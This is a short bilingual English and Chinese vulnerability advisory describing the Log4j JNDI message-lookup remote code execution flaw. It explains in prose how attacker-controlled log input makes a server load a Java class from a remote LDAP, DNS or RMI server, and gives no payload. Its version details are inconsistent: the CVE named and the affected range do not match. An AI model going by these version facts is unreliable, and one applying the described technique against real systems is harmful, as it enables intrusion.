Log4j - Remote Code Execution (Log4Shell - CVE-2021-45046) (CVE-2021-45046)

Log4j logging library is affected by a Remote Code Execution vulnerability. The root cause of the vulnerability is improper input validation in the JNDI functionality implemented in Apache Log4j <= 2.14.1. A feature called <b>message lookup substitution</b>, which is enabled by default in the affected versions, allows attackers to load and execute arbitrary Java code from a remote LDAP server. Furthermore, multiple protocols are supported in the JNDI lookups, including LDAP, LDAPS, DNS and RMI. Therefore, if an attacker can control the log messages and inject arbitrary code through one of the input parameters or in the HTTP headers, he can create a malicious Java class on a controlled server and the vulnerable server will use the lookup method to execute the Java class from the LDAP/LDAPS/DNS/RMI server. All the versions before 2.17.1 are affected.

Log4j 日志库受到远程代码执行漏洞的影响。该漏洞的根本原因在于 Apache Log4j <= 2.14.1 版本中实现的 JNDI 功能输入验证不当。一项名为<b>消息查找替换</b>的功能，在受影响的版本中默认启用，允许攻击者从远程 LDAP 服务器加载并执行任意 Java 代码。此外，JNDI 查找支持多种协议，包括 LDAP、LDAPS、DNS 和 RMI。因此，如果攻击者能够控制日志消息并通过其中一个输入参数或 HTTP 标头注入任意代码，则可以在受控服务器上创建恶意 Java 类，而受漏洞影响的服务器将使用查找方法从 LDAP/LDAPS/DNS/RMI 服务器执行该 Java 类。所有在 2.17.1 之前的版本均受影响。